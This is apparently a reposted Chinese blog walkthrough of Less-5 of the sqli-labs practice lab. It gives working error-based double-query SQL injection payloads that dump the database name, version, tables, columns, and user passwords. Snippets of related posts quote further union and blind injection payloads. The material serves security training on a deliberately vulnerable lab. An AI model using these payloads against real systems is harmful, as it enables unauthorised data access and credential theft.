SQLI DUMB SERIES-5
less5
(1)输入单引号,回显错误,说明存在注入点。输入的Id被一对单引号所包围,可以闭合单引号
(2)输入正常时:?id=1
说明没有显示位,因此不能使用联合查询了;可以使用报错注入,有两种方式
(3)双注入查询
参考资料:http://www.2cto.com/article/201303/192718.html
简单的说,使用聚合函数进行双注入查询时,会在错误信息中显示一部分错误信息,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。
1)爆数据库名
?id=-1' union select count(*),count(*),concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a--+
可知表明数据库名为"security"
2)将上述中的database(),改为version(),可得PHP版本
3)同样的方法可以爆用户名
4)爆表名
?id=-1' union select count(*),count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database()limit 2,1),floor(rand()*2)) as a from information_schema.tables group by a--+
改变Limit后面的数字可以爆出所有表名,例如
5)爆列名(以user表为例)
?id=-1' union select count(*),count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a--+
改变Limit后面的数字可以爆出所有列名,例如
6)爆字段
?id=-1' union select count(*),count(*),concat((select concat_ws('[',password,username) from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a--+
Password与username之间用'['隔开,同样改变Limit后面的数字可以爆出user表的所有字段。
转载于:https://www.cnblogs.com/momoli/p/10463358.html
SQLI DUMB SERIES-5相关推荐
- SQLI DUMB SERIES-8
SQLI DUMB SERIES-8思路 ?id=1'--+ 构造闭合发现没有回显 则我们使用盲注 盲注分为几种 布尔型盲注 Length() //返回字符串长度 Substr() //取字符串 用法 ...
- SQLI DUMB SERIES-1-2
安装了SQLI DUMB的题库 这些都是为了了解sql注入的方式,碰到的题目就是这样的题去找flag.现在就是去探索方法 首先我们要知道不管什么数据库注入,检测是否有注入点是第一步 第一题 1.提示输 ...
- SQLI DUMB SERIES-10
第十关的步骤与第九关相同 可以查看之前的第九关打法 SQLI DUMB SERIES-9 //猜库名?id=1' and if(ascii(substr(database(),1,1))=115,sl ...
- SQLI DUMB SERIES-2
SQLI DUMB SERIES-2思路 ?id=-1 union all select 1,database(),3 from users --+ ?id=-1 select 1,group_con ...
- SQLI DUMB SERIES-4
?id=1" 报错 You have an error in your SQL syntax; check the manual that corresponds to your MySQL ...
- SQLI DUMB SERIES-16
(1)无论怎么输入,都没有回显,但当输入 admin")#时,显示登录成功.若通过其他方法获取数据库的用户名,可通过这个方法登录成功. (2)获取其他信息可用考虑时间延迟注入.方法同15. ...
- SQLI DUMB SERIES-3
?id=1') 构造闭合 ?id=1') --+ 注释后面内容 ?id=1') order by 4–+ 4报错 3不报错 故有3列 ?id=-1') union all select 1,2,3 f ...
- SQLI DUMB SERIES-1
less-1 (1) 可以看到提示输入ID,而且less-1题目也有提到GET,因此试试以下操作: http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果: ...
- SQLI DUMB SERIES-7
(1)查看PHP源代码 可以看见输入的id被一对单引号和两对圆括号包围 (2)根据提示:Dump into Outfile可知,此次攻击需要导出文件 (3)在第一关获取 @@datadir 读取数据库 ...
最新文章
- C#基础系列:实现自己的ORM(反射以及Attribute在ORM中的应用)
- 支持向量机中的函数距离的理解
- 2.2.5 操作系统之调度算法(时间片轮转调度算法、优先级调度算法、多级反馈队列调度算法)
- linux中断申请之request_threaded_irq 【转】
- SAP License:SAP的采购组
- Visual Studio-运行库的设置
- candence pcb走线等长_Allegro的通用等长规则设置方法
- ubuntu 安装 man 查看函数原型
- c++ssh连接_多台WIN10之间的SSH免密登录
- GNS3中下载路由器
- 树莓派交叉编译USB转网卡驱动_incomplete
- 【每日一P】利用通道抠图更换天空
- day03数据包拓展——抓包封包
- 10G数据量,只有2G内存,怎样找到中位数?
- 1.4.17 实验17:ASBR
- 基于深度学习的遥感测绘行业解决方案
- Git与bitbucket简单使用
- java-net-php-python-ssm高校学生学业分析及预警系统查重PPT计算机毕业设计程序
- 番外.李宏毅学习笔记.ST3.Structured SVM
- dos模拟器即时存档工具_DOS模拟器手机版|DOS模拟器最新安卓版apk下载v1.0.60 - 找游戏手游网...
热门文章
- WMI技术介绍和应用——查询系统信息和补丁包信息
- 在Windows/Ubuntu上使用Visual Studio Code作为Go语言编辑器操作步骤
- oracle数据库性能awr,常见问题:如何使用AWR报告来诊断数据库性能问题
- mybatis 一对多_Springboot整合Mybatis实现级联一对多CRUD操作
- 2019智能手表推荐_智能手表一定越贵越好?试用过后这五款才真正值得推荐
- php环境搭建 warmp_PHP环境搭建
- ios alertview 链接_iOS-MobLink集成流程
- apktoolkit apk反编译没有文件_重新编译mono——修改apk中Assembly-CSharp.dll并重新打包...
- 我们参观机器人产业园的感想_工商联组织执常委赴醴陵华鑫电瓷电器产业园交流学习...
- mysql被拖垮_说几个拖垮系统的小细节!